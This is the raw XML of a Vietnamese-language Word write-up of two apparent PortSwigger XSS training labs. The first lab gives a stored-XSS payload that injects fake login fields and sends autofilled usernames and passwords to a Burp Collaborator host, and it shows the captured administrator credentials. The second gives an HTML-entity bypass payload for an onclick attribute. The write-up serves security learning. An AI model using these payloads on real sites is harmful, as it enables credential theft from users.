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EFD4" w14:textId="00B3B6F5" w:rsidR="00074179" w:rsidRDefault="00112BBA" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1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Bài 1: </w:t>
      </w:r>
      <w:r w:rsidR="00074179" w:rsidRPr="00074179">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exploiting cross-site scripting to capture passwords</w:t>
      </w:r>
      <w:r w:rsidR="00074179">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C2A72" w14:textId="06B99E1B" w:rsidR="00074179" w:rsidRDefault="00074179" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1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Bài này là lỗi Stored XSS. Mình thử vào 1 bài viết và bình luận thử.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195959CA" w14:textId="77BBE28D" w:rsidR="00074179" w:rsidRPr="00211AAE" w:rsidRDefault="00074179" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99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 xml:space="preserve">Ứng dụng đã phản hồi sau:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00211AAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;p&gt;I love you&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF40BE" w14:textId="3239B1B6" w:rsidR="00074179" w:rsidRDefault="00074179" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1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 xml:space="preserve">Thử </w:t>
      </w:r>
      <w:r w:rsidRPr="00211AAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B4698F" w:rsidRPr="00211AAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B4698F" w:rsidRPr="00B4698F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00B4698F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ứng dụng đã bị lỗi XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34EEE3" w14:textId="48BD59C6" w:rsidR="00B4698F" w:rsidRDefault="00B4698F" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1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Do người dùng sử dụng password manager để tự động điền mk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE0ACC" w14:textId="28FBC90A" w:rsidR="00B4698F" w:rsidRDefault="00B4698F" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1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Bạn có thể lợi dụng điều này bằng cách tạo 2 input user và pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697F82E9" w14:textId="506F612D" w:rsidR="00074179" w:rsidRPr="00074179" w:rsidRDefault="00211AAE" w:rsidP="00074179">
      <w:pPr>
        <w:pStyle w:val="Heading1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Khi đầu vào bị thay đổi nó lập tức yêu cầu đến máy chủ của kẻ tấn công (burp collaborator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A696675" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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&lt;input id="u" type="text" name="username"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288C53F2" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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&lt;input id="p" type="password" name="password"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D42A8" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272F569" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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var userElement=document.querySelector('#u')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D7079" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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var passElement=document.querySelector('#p')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631095B1" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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userElement.onchange=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B88F0" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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new Image().src = "https://i9sxz8a8aqcnnykb9q84ivzce3kt8i.oastify.com/?user="+userElement.value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1064E" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB8AC5" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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passElement.onchange=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12377665" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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new Image().src = "https://i9sxz8a8aqcnnykb9q84ivzce3kt8i.oastify.com/?pass="+passElement.value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C5CE77" w14:textId="77777777" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793BBA7A" w14:textId="5BEFDE07" w:rsidR="002F49FE" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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 w:rsidRPr="00C22ED7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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2594DA" w14:textId="36E97908" w:rsidR="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED7">
      <w:pP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</w:p>
    <w:p w14:paraId="35D4FDDA" w14:textId="05A031CA" w:rsidR="00C22ED7" w:rsidRPr="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED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2E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/?user=administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26DD76" w14:textId="097E96DF" w:rsidR="00C22ED7" w:rsidRDefault="00C22ED7" w:rsidP="00C22ED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2E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/?pass=gtjax3zjjh1vcb5o55jl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2E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Thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E8F86" w14:textId="2484FAF5" w:rsidR="00112BBA" w:rsidRDefault="00112BBA" w:rsidP="00C22ED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2DDF41" w14:textId="77777777" w:rsidR="00112BBA" w:rsidRDefault="00112BBA" w:rsidP="00112BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76027302" w14:textId="77777777" w:rsidR="00112BBA" w:rsidRDefault="00112BBA" w:rsidP="00112BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9C71BA" w14:textId="1792CE56" w:rsidR="00112BBA" w:rsidRPr="00112BBA" w:rsidRDefault="00112BBA" w:rsidP="00112BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112BBA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00112BBA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stored XSS into onclick event with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112BBA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112BBA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brackets and double quotes HTML-encoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112BBA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15537555" w14:textId="360DE1ED" w:rsidR="00112BBA" w:rsidRDefault="00112BBA" w:rsidP="00112BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112BBA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single quotes and backslash escaped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA123DA" w14:textId="345204F1" w:rsidR="00112BBA" w:rsidRDefault="00112BBA" w:rsidP="00112BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46011C4D" w14:textId="70ECC446" w:rsidR="00112BBA" w:rsidRDefault="00B72A3A" w:rsidP="00112BBA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing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Bài toán này có lỗ hổng Stored XSS trong chức năng bình luận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C611F" w14:textId="3D28690F" w:rsidR="00112BBA" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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Trong phần bình luận, có 4 đầu vào: comment, tên, mail, website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52532C88" w14:textId="5BE02D34" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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330EE3" w14:textId="50C2BD94" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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Comment: </w:t>
      </w:r>
      <w:r w:rsidR="009A3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&lt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA51F40" w14:textId="7FACCACA" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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ECA0D8" w14:textId="660E3B9C" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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Tên: nguyen dang hieu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B11C921" w14:textId="045DE1B1" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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F0C4441" w14:textId="20A7E997" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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Mail: caiphandeptrai@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B918B9" w14:textId="27CE61CD" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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6F9FC3" w14:textId="338AC738" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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Website: http://portswigger.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E098FB3" w14:textId="7FDAB67E" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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97F258" w14:textId="333885C6" w:rsidR="00FE77E2" w:rsidRDefault="00FE77E2" w:rsidP="00C22ED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Ứng dụng phản hồi như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B14ED4" w14:textId="77777777" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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1E93D4" w14:textId="5B8BF7E1" w:rsidR="009A3746" w:rsidRPr="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481BF856" w14:textId="4848F47F" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A374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&lt;img src="/resources/images/avatarDefault.svg" class="avatar"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD881AB" w14:textId="77777777" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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&lt;a id="author" href="https://portswigger.net/" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C77FDB5" w14:textId="77777777" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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onclick="var tracker={track(){}};tracker.track(</w:t>
      </w:r>
      <w:r w:rsidRPr="006776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9A3746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://portswigger.net/</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3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');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BAC89F" w14:textId="77777777" w:rsidR="009A3746" w:rsidRPr="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A3746">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nguyen dang hieu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721B9151" w14:textId="424CD601" w:rsidR="009A3746" w:rsidRPr="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A374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&lt;/a&gt; | 20 November 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBFED2" w14:textId="77777777" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874B042" w14:textId="77777777" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D32E8F" w14:textId="77777777" w:rsidR="009A3746" w:rsidRPr="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A3746">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;lt;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92178E" w14:textId="5AAE08CD" w:rsidR="00FE77E2" w:rsidRDefault="009A3746" w:rsidP="009A37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&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61948D0B" w14:textId="1AF3C068" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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290E5B" w14:textId="6E2B492A" w:rsidR="009A3746" w:rsidRDefault="009A3746" w:rsidP="009A37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Có vẻ như</w:t>
      </w:r>
      <w:r w:rsidR="000A71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tất cả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A71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 đã mã hóa html những kí tự sau: &lt;, &gt;, “ và thêm \ trước ‘.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2CB71" w14:textId="39637934" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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2DA0D9" w14:textId="57BBAB4B" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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Nhưng khi bối cảnh XSS là Javascript trong thuộc tính, có thể sử dụng mã hóa html để bỏ qua bộ lọc. Ta sẽ tiêm payload sau vào input website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6FA5D" w14:textId="77777777" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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3AE9AB" w14:textId="6F9C376A" w:rsidR="000A71A6" w:rsidRPr="00677667" w:rsidRDefault="00677667" w:rsidP="009A3746">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00677667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https://portswigger.net/</w:t>
      </w:r>
      <w:r w:rsidR="000A71A6" w:rsidRPr="00677667">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;apos;-alert(document.domain)-&amp;apos;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B38B0" w14:textId="4B9A90E1" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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B4D285" w14:textId="75E36ADC" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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Lúc này ứng dụng sẽ phản hồi sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EDAF0E" w14:textId="77777777" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="000A71A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E2952E" w14:textId="77777777" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="000A71A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0384D5" w14:textId="0E61901E" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="000A71A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&lt;a id="author" href="https://portswigger.net/" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170BD0D3" w14:textId="72E28C28" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="000A71A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onclick="var tracker={track(){}};tracker.track(</w:t>
      </w:r>
      <w:r w:rsidRPr="006776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9A3746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://portswigger.net/</w:t>
      </w:r>
      <w:r w:rsidR="00677667">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’-alert(document.domain)-‘</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3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');"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="006776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77667" w:rsidRPr="006776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="006776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thực thi Javascript thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63F6E5" w14:textId="77777777" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="000A71A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93EF55" w14:textId="50514048" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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1BF108" w14:textId="77777777" w:rsidR="000A71A6" w:rsidRDefault="000A71A6" w:rsidP="009A37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C97C27" w14:textId="77777777" w:rsidR="000A71A6" w:rsidRPr="00C22ED7" w:rsidRDefault="000A71A6" w:rsidP="009A374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0A71A6" w:rsidRPr="00C22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A1"/>
    <w:rsid w:val="00070088"/>
    <w:rsid w:val="00074179"/>
    <w:rsid w:val="000A71A6"/>
    <w:rsid w:val="000E169F"/>
    <w:rsid w:val="000F772C"/>
    <w:rsid w:val="00112BBA"/>
    <w:rsid w:val="00211AAE"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00677667"/>
    <w:rsid w:val="007470E0"/>
    <w:rsid w:val="009A3746"/>
    <w:rsid w:val="00B4698F"/>
    <w:rsid w:val="00B72A3A"/>
    <w:rsid w:val="00B72BA1"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF2E14"/>
    <w:rsid w:val="00C22ED7"/>
    <w:rsid w:val="00C3624E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B2E072"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8D5F450E-CB28-1F4A-9183-B6AD0F64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1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741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6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E169F"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00112B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2022-11-18T02:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-20T10:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>